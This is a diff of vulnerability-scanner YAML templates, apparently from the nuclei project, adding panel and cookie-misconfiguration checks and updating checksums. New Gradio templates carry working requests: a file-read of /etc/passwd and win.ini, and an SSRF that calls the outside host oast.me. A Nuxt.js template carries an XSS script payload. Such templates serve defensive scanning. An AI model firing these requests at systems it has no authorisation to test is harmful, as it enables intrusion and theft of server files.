+    shodan-query: http.title:"IBM iNotes Login"
     product: inotes
-  tags: ibm,edb,panel
+  tags: ibm,edb,panel,login,detect
 
 http:
   - method: GET
     path:
       - '{{BaseURL}}'
       - '{{BaseURL}}/names.nsf'
+      - '{{BaseURL}}/webredir.nsf'
+
+    stop-at-first-match: true
 
     matchers-condition: and
     matchers:
       - type: word
         words:
           - '<title>IBM iNotes Login</title>'
+          - 'Lotus iNotes Login Screen'
+        condition: or
 
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220625a17ef31b35dda3592e49539d8304cc60542ca9c8d2ec4f5509568cd46f673022100f22616c9c57ba6f9ea927df6ff590fcbeb9eb33d5a1afcf66c6dd0afe77f2d7d:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100a019cfe0aba9fc651490032a791ac8c3fc7f5b9ee782c44e122161c3698cc039022100c97e7c7c28a69a32b3a4fbc73ab34d5599f81a8c34d85e266347905e4da0df9a:922c64590222798bb761d5b6d8e72950

http/exposed-panels/ibm/ibm-security-access-manager.yaml

@@ -2,7 +2,7 @@ id: ibm-security-access-manager
 
 info:
   name: IBM Security Access Manager Login Panel - Detect
-  author: geeknik
+  author: geeknik,righettod
   severity: info
   description: IBM Security Access Manager login panel was detected.
   reference:
@@ -14,8 +14,9 @@ info:
   metadata:
     max-request: 1
     vendor: ibm
+    shodan-query: http.title:"IBM Security Access Manager"
     product: security_access_manager
-  tags: panel,ibm
+  tags: panel,ibm,login,detect
 
 http:
   - method: GET
@@ -27,7 +28,9 @@ http:
       - type: word
         words:
           - "<title>IBM Security Access Manager</title>"
+          - "IBM Security <em>Access Manager</em>"
         part: body
+        condition: or
 
       - type: word
         words:
@@ -40,4 +43,4 @@ http:
           - "/mga/sps/authsvc/policy/forgot_password"
         part: body
         condition: and
-# digest: 4a0a00473045022100b3c31b972a1af3fbf321e8d2fad135f3c60e69ab84023684e3bdc1903e0a3f75022016212bd0980f645527268ebe265aed9838f5fe47d1fd9a37ffbac227e5765894:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c816b86e40021cbe5ef080a1ebc36d14d60604fc4f2c7deb3f6094655b03ed26022100fa945950ba3d39b400e461e14e07ed6ed86b1b31fd9c7d2e2925cb752f4df0cf:922c64590222798bb761d5b6d8e72950

http/exposed-panels/turnkey-lamp-panel.yaml

@@ -0,0 +1,33 @@
+id: turnkey-lamp-panel
+
+info:
+  name: TurnKey LAMP Panel - Detect
+  author: ritikchaddha
+  severity: info
+  description: |
+    TurnKey LAMP Control Panel was detected.
+  reference:
+    - https://www.turnkeylinux.org/lamp
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: title:"TurnKey LAMP"
+    fofa-query: title="TurnKey LAMP"
+  tags: panel,login,turnkey,lamp,detect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "TurnKey LAMP</title>"
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a004830460221008e88f309cb2b1e984efcb8d583f2474a3bb35485e4cb1ce1465533744bfc7f810221009649f52bc1dbea811b3eccf48f2df29d0d3e1e4c6bda50f7e0f405248148c0d6:922c64590222798bb761d5b6d8e72950

http/misconfiguration/aws/aws-object-listing.yaml

@@ -30,10 +30,18 @@ http:
         words:
           - application/xml
 
+      - type: word
+        part: header
+        words:
+          - "x-goog-metageneration"
+          - "x-goog-generation"
+        case-insensitive: true
+        negative: true
+
     extractors:
       - type: regex
         part: body
         group: 1
         regex:
           - '<Name>([a-z0-9-._]+)'
-# digest: 4a0a004730450221008d3e2a3f2b51e293c931760a955f03b3fefa01df69177a3d7403db90accb33b402201a4fcc8481d353ec5ac6f5fdb08d85360d3facda2b3623b16e95f5ac517859a3:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100b4e7ee7ca74a63f236707271d9219e6a4c1e204e12e3e8bb2d3714a64fa9e5a8022068ee95e033478df3256a2323cf1d05917f9d857f58146001422a1b7861ce02a3:922c64590222798bb761d5b6d8e72950

http/misconfiguration/cookies-without-httponly.yaml

@@ -1,7 +1,7 @@
-id: cookies-without-httponly-secure
+id: cookies-without-httponly
 
 info:
-  name: Cookies without HttpOnly or Secure attribute - Detect
+  name: Cookies without HttpOnly attribute - Detect
   author: princechaddha,Mr.Bobo HP
   severity: info
   description: |
@@ -38,6 +38,5 @@ http:
         part: header
         words:
           - "HttpOnly"
-          - "Secure"
         negative: true
-# digest: 4a0a004730450220123181274d69492219d698d89cf1fd5d0b71c908b139b6a52e15df69c7b8c6aa022100da21796dba95fc800f492b76bed8877b493b296856dc7f71fe89da22aff0fe3f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100d9b191fde19b5091d9b1ed789721ea3e93689c0b964658df7a578d1e5903ea5802205b26c3af43b5b32a731d2ecd2ef48401ae45a37258168e67710fb2f47abb0989:922c64590222798bb761d5b6d8e72950

http/misconfiguration/cookies-without-secure.yaml

@@ -0,0 +1,42 @@
+id: cookies-without-secure
+
+info:
+  name: Cookies without Secure attribute - Detect
+  author: vthiery
+  severity: info
+  description: |
+    Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS
+  impact: |
+    Lack of Secure flag on cookies allows the cookie to be sent over unsecure HTTP, making it vulnerable to man-in-the-middle (MITM) attacks.
+  remediation: |
+    Ensure that all cookies are set with the Secure attribute to prevent MITM attacks.
+  reference:
+    - https://owasp.org/www-community/controls/SecureCookieAttribute
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cvss-score: 0
+  metadata:
+    verified: true
+    max-request: 1
+  tags: misconfig,http,cookie,generic
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie'
+
+      - type: word
+        part: header
+        words:
+          - "Secure"
+        negative: true
+# digest: 4a0a0047304502201f25fc7e9994e80e24096e05ea5deaeae1785bbfa343e9e71203f64f6ab2c22902210080b280e3b3384bb5332aaf450b1c9e541b0e43795a97df1bfe8d050f4742c277:922c64590222798bb761d5b6d8e72950

http/technologies/google/google-storage.yaml

@@ -15,9 +15,9 @@ http:
 
     matchers:
       - type: word
-        words:
-          - x-goog-metageneration
-          - X-Goog-Metageneration
         part: header
-
-# digest: 4a0a00473045022016072ed0dd17077e2035b0d53506ba19f8dc600c375fd55b469870b2b36c2d17022100b6f9dde6d428cffc1cae21932a1a5a81ff87f210e1f8dd572d63255596c082ff:922c64590222798bb761d5b6d8e72950
+        words:
+          - "x-goog-metageneration"
+          - "x-goog-generation"
+        case-insensitive: true
+# digest: 4a0a00473045022043c130c84c7c7ff302413d36f39fdd14b34e2ae766c8728f2d7ef891cd125f80022100c51e9928d746128a91e866f8bd77bb46897602cc17ed9d9fbacbfd9de7794e68:922c64590222798bb761d5b6d8e72950

http/vulnerabilities/gradio/gradio-lfi.yaml

@@ -0,0 +1,64 @@
+id: gradio-lfi
+
+info:
+  name: Gradio 3.47 – 3.50.2 - Local File Inclusion
+  author: nvn1729
+  severity: high
+  description: |
+    Local file read by calling arbitrary methods of Components class between Gradio versions 3.47 – 3.50.2
+  reference:
+    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
+    - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    epss-percentile: 0.36659
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: html:"__gradio_mode__"
+  tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
+
+http:
+  - raw:
+      - |
+        POST /component_server HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}
+
+      - |
+        GET /file={{download_path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        name: download_path
+        internal: true
+        group: 1
+        regex:
+          - "\"?([^\"]+)"
+
+    attack: clusterbomb
+    payloads:
+      fuzz_component_id: helpers/wordlists/numbers.txt
+      path:
+        - /etc/passwd
+        - c:\\windows\\win.ini
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body_2
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100dee488452114cf8cba3e74b09165ce96dd590f0ac0705828cdc977a8a8bd5f39022100d64d96b1ba3cd9e79039f6b3436f1cf7fd37e88bb8bb0249b76423524c3939a4:922c64590222798bb761d5b6d8e72950

http/vulnerabilities/gradio/gradio-ssrf.yaml

@@ -0,0 +1,58 @@
+id: gradio-ssrf
+
+info:
+  name: Gradio 3.47 - 3.50.2 - Server-Side Request Forgery
+  author: nvn1729
+  severity: high
+  description: |
+    Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2.
+  reference:
+    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
+    - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    epss-percentile: 0.36659
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: html:"__gradio_mode__"
+  tags: cve,cve2024,unauth,gradio,ssrf
+
+http:
+  - raw:
+      - |
+        POST /component_server HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"component_id": "{{fuzz_component_id}}", "data": "http://oast.me", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"}
+
+      - |
+        GET /file={{download_path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        name: download_path
+        group: 1
+        regex:
+          - "\"?([^\"]+)"
+        internal: true
+
+    payloads:
+      fuzz_component_id: helpers/wordlists/numbers.txt
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - "<h1> Interactsh Server </h1>"
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a0048304602210084254e5be884aa98296a738a4c7318f5fc3144cd7a242e19dfc57c3e7540a125022100db240aae793f3c25c826a49fe256d4109590d1fd40a2ad08de4d75925b3985f3:922c64590222798bb761d5b6d8e72950

http/vulnerabilities/nuxt/nuxt-js-xss.yaml

@@ -1,7 +1,7 @@
 id: nuxt-js-xss
 
 info:
-  name: Error Page XSS - Nuxt.js
+  name: Nuxt.js Error Page - Cross-Site Scripting
   author: DhiyaneshDK
   severity: medium
   description: |
@@ -11,23 +11,26 @@ info:
     - https://bryces.io/blog/nuxt3
     - https://twitter.com/fofabot/status/1669339995780558849
   metadata:
-    verified: "true"
+    verified: true
     max-request: 1
     shodan-query: html:"buildAssetsDir" "nuxt"
     fofa-query: body="buildAssetsDir" && body="__nuxt"
-  tags: huntr,xss,nuxtjs,error
+  tags: huntr,xss,nuxtjs
+
+variables:
+  payload: "<script>alert(document.domain)</script>"
 
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/__nuxt_error?stack=%0A<script>alert(document.domain)</script>"
+      - "{{BaseURL}}/__nuxt_error?stack=%0A{{url_encode(payload)}}"
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "<script>alert(document.domain)</script>"
+          - "{{payload}}"
           - "window.__NUXT__"
         condition: and
 
@@ -35,5 +38,4 @@ http:
         part: header
         words:
           - "text/html"
-
-# digest: 4a0a00473045022100858932f971761dbf5f90cae1f6fd762587bc8db062bc348a0e75e6919d1c1ed502207f3e15e50de570269cc2d415aea273f1abb2440e270d272e572e7081f2a59402:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e184ac245cc42774284e2fda8f4ffd559e46ffb273b587dfab98c576f73b92fa022100931427a4621c57da048aa4fdc2981b8ad64512cf8d4894e3dc3f1ce607d0b090:922c64590222798bb761d5b6d8e72950

templates-checksum.txt

@@ -189,8 +189,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
 code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
-cves.json:15e3d2b258890ea3f6670c981a4b0703d98a1b98
-cves.json-checksum.txt:eb4c7db68b582f0cd4ecf6cdb67ff52c6532e739
+cves.json:bb4672b4751b17c034799fabf7d52f0c8aed3302
+cves.json-checksum.txt:b10cb415f16dd74d75e70e696defacaf045d8c3e
 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730
 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752
 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
@@ -206,11 +206,12 @@ dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d3
 dast/vulnerabilities/redirect/open-redirect.yaml:4fa1fca9a4a36c7fd81faafd3f7bf474b4efa471
 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836
 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f
+dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74
 dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26
 dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661
 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851
 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253
-dast/vulnerabilities/xss/reflected-xss.yaml:cbb257b78545acfdb058780827b255ca8ac6099c
+dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f
 dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a
 dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a
 dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0
@@ -614,11 +615,12 @@ helpers/payloads/swagger-payload:6e0a08fc7310a1ce07226a012520ba1f73029945
 helpers/payloads/wp-social-warfare-rce.txt:6b93ad84c3035c6779d75057e645171476cbc530
 helpers/wordlists/adminer-paths.txt:2ac24141ad5f28203b9ca35719bd51f39381aa36
 helpers/wordlists/grafana-plugins.txt:0621c38f856c64ac8c96e53b96bc90881fe35704
-helpers/wordlists/headers.txt:2effcf74fe0332b242c98df1f50f774c556746d6
+helpers/wordlists/headers.txt:1d92a664669f50906e4ad90d299f78cbeb6f8687
 helpers/wordlists/mdb-paths.txt:c380943cfa8a337ccb1ea38062e2856924960f1a
 helpers/wordlists/mysql-passwords.txt:39cb7f9500b441097c09510fbf93b7c123cd77e9
 helpers/wordlists/mysql-users.txt:d46fe9fd35f6b8d4de6901572e04bcc0845e8332
 helpers/wordlists/numbers.txt:8084f0f10255c5e26605a1cb1f51c5e53f92df40
+helpers/wordlists/params.txt:503c5527904f6c8846d31f87b1ac565c61d7c6c6
 helpers/wordlists/prestashop-modules.txt:ae73ac19d088b28a943e8a9ce98ab4461e4dc029
 helpers/wordlists/shiro_encrypted_keys.txt:3a072e8246dabee62eecfd62edef1b3977165f34
 helpers/wordlists/ssh-passwords.txt:04aaf532580a605e8356df448196ac06939ad544
@@ -1927,7 +1929,7 @@ http/cves/2020/CVE-2020-7796.yaml:6157549eb38e8fc6de1a599af340892651ab2a72
 http/cves/2020/CVE-2020-7943.yaml:8afe020a36b1eb69a2b2eb06c08f9f4cd0ca5ff2
 http/cves/2020/CVE-2020-7961.yaml:6e6a2d87ac59b710e9f06ac8468de57cd0695f9a
 http/cves/2020/CVE-2020-7980.yaml:1b8c02806c66311834a931181b6acb7fada2bc9d
-http/cves/2020/CVE-2020-8115.yaml:68173d36e231cef7317d8a24655cde2134bf2052
+http/cves/2020/CVE-2020-8115.yaml:6f19a8294b923f314ce8b28098bd70e55a123858
 http/cves/2020/CVE-2020-8163.yaml:1d8b50738e8aa4b505e6dda88b20fa7716de3ee5
 http/cves/2020/CVE-2020-8191.yaml:eb7ce1550e3c02349142058d5a0b9a713e810915
 http/cves/2020/CVE-2020-8193.yaml:4284d6d0a6afaa9469244d30d5ff29ff306d8ce6
@@ -2365,6 +2367,7 @@ http/cves/2021/CVE-2021-43734.yaml:ba2e81ae59684a8bcfde140cc091cb3a77e3f427
 http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9
 http/cves/2021/CVE-2021-43798.yaml:6afb9139e24bf0c40b9e5a0c12e49f83793920c2
 http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f
+http/cves/2021/CVE-2021-43831.yaml:89f39234d1633cece6948896980a84ad95fafcb4
 http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d
 http/cves/2021/CVE-2021-44138.yaml:a802f5e3f53e4f8211dfd348b2ca5ddcb9304732
 http/cves/2021/CVE-2021-44139.yaml:740e49a49ce3c88b450eabd43ae798ffcacf8a0e
@@ -3040,6 +3043,7 @@ http/cves/2023/CVE-2023-31059.yaml:ce8e595c554e7f91bb6e4ed339d987e571ffb947
 http/cves/2023/CVE-2023-31446.yaml:5accf9db37b634e8c8bcc2cd58586c8e0df71827
 http/cves/2023/CVE-2023-31465.yaml:34cb2d553d530d7ad867cf82d889cba8c6153019
 http/cves/2023/CVE-2023-31548.yaml:0f5f5182e5679b2d22cc503cd577b487ef7fe72d
+http/cves/2023/CVE-2023-32068.yaml:41b3c520f9803190b0bff32818680581cbea97fe
 http/cves/2023/CVE-2023-32077.yaml:4fd13fb1ff9440e463e7d615d2f1ba70395821b9
 http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b
 http/cves/2023/CVE-2023-3219.yaml:245f94f5a5a80ebd7cd5912e7849ad425cfcc8cb
@@ -3216,6 +3220,7 @@ http/cves/2023/CVE-2023-5074.yaml:0bee1e0b2d77d0ffbbbf8cc00d53acb4979ae28f
 http/cves/2023/CVE-2023-5089.yaml:c51f608a3a99b7a7ea1a90f49badde7d12cf1e6f
 http/cves/2023/CVE-2023-50917.yaml:f0cb72641b1188fc2f7a615137512a1b956eeeba
 http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62
+http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a
 http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d
 http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8
 http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d
@@ -3272,6 +3277,7 @@ http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f
 http/cves/2024/CVE-2024-1561.yaml:659c9112fbbf202496c98637b8ffcfd2665024ab
 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983
 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a
+http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46
 http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2
 http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411
 http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b
@@ -3292,6 +3298,7 @@ http/cves/2024/CVE-2024-24919.yaml:0af6fe4076dcedc1a40e7b991c546f6473dbab1c
 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05
 http/cves/2024/CVE-2024-25669.yaml:859ce6829af85dcbbc97aff746be54b6ab8d4d23
 http/cves/2024/CVE-2024-25735.yaml:62e4fcd344865c267789835cfbc7bd1677e002d3
+http/cves/2024/CVE-2024-2621.yaml:5b501a9ff0e69b8bfd0df0caaf97ebbaaba51301
 http/cves/2024/CVE-2024-26331.yaml:1f13e279312f16452413eae02b0cb32971d720f8
 http/cves/2024/CVE-2024-27198.yaml:428b5bbb2a88c48db434e13c0fdc3dea195f4a6f
 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d
@@ -3304,26 +3311,31 @@ http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8
 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1
 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b
 http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43
+http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225
 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca
 http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100
 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9
 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2
 http/cves/2024/CVE-2024-31621.yaml:53f009e716d10910d474a4dec892fefd6524efae
+http/cves/2024/CVE-2024-31750.yaml:79b602d5b722a6a716b628652d2dd2955b50e4a1
 http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c
 http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe
 http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca
 http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690
+http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56
 http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5
 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74
 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c
 http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00
+http/cves/2024/CVE-2024-3274.yaml:b56159631d06052a408c3897ef043b866ce0514c
 http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab
 http/cves/2024/CVE-2024-33575.yaml:bc3e1dc9d582e0bb3430a33791936484425fb962
 http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc
 http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2
 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8
 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654
-http/cves/2024/CVE-2024-37393.yaml:20d877ad8786073ac602c19cd95eacb4f8d73436
+http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189
+http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd
 http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c
 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310
 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181
@@ -3956,9 +3968,9 @@ http/exposed-panels/ibm/ibm-dcec-panel.yaml:85de4a0aac53b7dd180b06e04f837e737a76
 http/exposed-panels/ibm/ibm-decision-server-console.yaml:9bc550d72018a4bb6fd09c5466136ddfb003891e
 http/exposed-panels/ibm/ibm-maximo-login.yaml:aaf8da0bfec6d4b716d5f5eeba93337e0064ab21
 http/exposed-panels/ibm/ibm-mqseries-web-console.yaml:fe2cb848a2d5afd37b6701deac3321ab96befab9
-http/exposed-panels/ibm/ibm-note-login.yaml:66155682019a6922f6b68bc4125a86812de71879
+http/exposed-panels/ibm/ibm-note-login.yaml:8a5f0a28a24b645b7d2e0c499246e08276dfcfcd
 http/exposed-panels/ibm/ibm-odm-panel.yaml:a4b0d5f8dd884061a745fe85fea95887dc948e23
-http/exposed-panels/ibm/ibm-security-access-manager.yaml:83faa8d7636cd912e030c69615cf5e6fa59e871c
+http/exposed-panels/ibm/ibm-security-access-manager.yaml:0cd521ff1a0b1bd1fccc74d9b3a1b16c9805a5b8
 http/exposed-panels/ibm/ibm-service-assistant.yaml:900e28a644df1ddafc2074599f3606f7d150aab4
 http/exposed-panels/ibm/ibm-websphere-admin-panel.yaml:feb2ce063c143b44b20b6933e9d9de9d15f3fc06
 http/exposed-panels/ibm/ibm-websphere-panel.yaml:63ec51d2ef895c41790d02a2e7c9e599ea72d438
@@ -4503,6 +4515,7 @@ http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:d2198b812f4062c0f360e
 http/exposed-panels/truenas-scale-panel.yaml:56f855f113eb0d8fe648485a1ba0ea24988ae7da
 http/exposed-panels/tufin-securetrack-login.yaml:63c396fb780b3aa5de4176aea0e183338ef43943
 http/exposed-panels/tup-openframe.yaml:8e6f0bcd762cdf9098621e8323e811b702424060
+http/exposed-panels/turnkey-lamp-panel.yaml:8ec785a66d2050a19b465630ee89555e0d90798a
 http/exposed-panels/turnkey-openvpn.yaml:499a14d9a3eb9ca68ffcf856cd357b8a552bf30b
 http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767
 http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996
@@ -5288,7 +5301,7 @@ http/misconfiguration/apache/apache-couchdb-unauth.yaml:f1a42febc03d40ab2eb27519
 http/misconfiguration/apache/apache-filename-enum.yaml:00fec57e8abf4422bb9223a4f1ce706b023f0eef
 http/misconfiguration/apache/apache-hbase-unauth.yaml:73f22979593c54310c2145d482018010663fe9a2
 http/misconfiguration/apache/apache-nifi-unauth.yaml:4e19b0b31aea4665b8ca4fa4c2aa6380182ce120
-http/misconfiguration/apache/apache-server-status-localhost.yaml:66cb8088785ba5ec211abc13b82eeef13a4a1213
+http/misconfiguration/apache/apache-server-status-localhost.yaml:ed27964d3819446bb04a4095a3edf2ae58872cba
 http/misconfiguration/apache/apache-server-status.yaml:1afd6683f4ff99098d2c8a81ea650f1be4a81926
 http/misconfiguration/apache/apache-storm-unauth.yaml:a4e0f588e65474220083ff0960511fc324b4f139
 http/misconfiguration/apache/apache-zeppelin-unauth.yaml:18859a2711b1796228e38d53e2588c4a211e33d4
@@ -5306,7 +5319,7 @@ http/misconfiguration/artifactory-anonymous-deploy.yaml:49628b203377dc7a16449154
 http/misconfiguration/aspx-debug-mode.yaml:338648e96f3123018a8373d5b3bfe61c5c201bb1
 http/misconfiguration/atlassian-bamboo-build.yaml:65a75813eec4e3918e5efcc46669bebe3b4310ba
 http/misconfiguration/aws/aws-ec2-status.yaml:676383b1e7312422e3a7359ae0ede6e5500ec9ea
-http/misconfiguration/aws/aws-object-listing.yaml:4b9e4b852563898d23697d06b8a6d057c5ce8dae
+http/misconfiguration/aws/aws-object-listing.yaml:7c4d6662bbadf6585a95adbbfee865113a08888d
 http/misconfiguration/aws/aws-redirect.yaml:3eae321734d805abec1fdc57bb8d110504106276
 http/misconfiguration/aws/aws-s3-explorer.yaml:8ecb526ca030871303b3e3f0349edaf292f30f55
 http/misconfiguration/aws/aws-xray-application.yaml:e7ec644ccf2a75882aeace1f7192b1bf5ba62db1
@@ -5335,7 +5348,8 @@ http/misconfiguration/collectd-exporter-metrics.yaml:c47a1526e0297b0f553cbd12b0f
 http/misconfiguration/command-api-explorer.yaml:ab22381f1611d06739015ed9ed6d87627905c86a
 http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b1b0fb3a0f16b90760a93b
 http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0
-http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51
+http/misconfiguration/cookies-without-httponly.yaml:b7d3567792f6d1da6385c3c2393db6e65216cdf8
+http/misconfiguration/cookies-without-secure.yaml:624a1b5f88d0aff132d199eeffca11595bead000
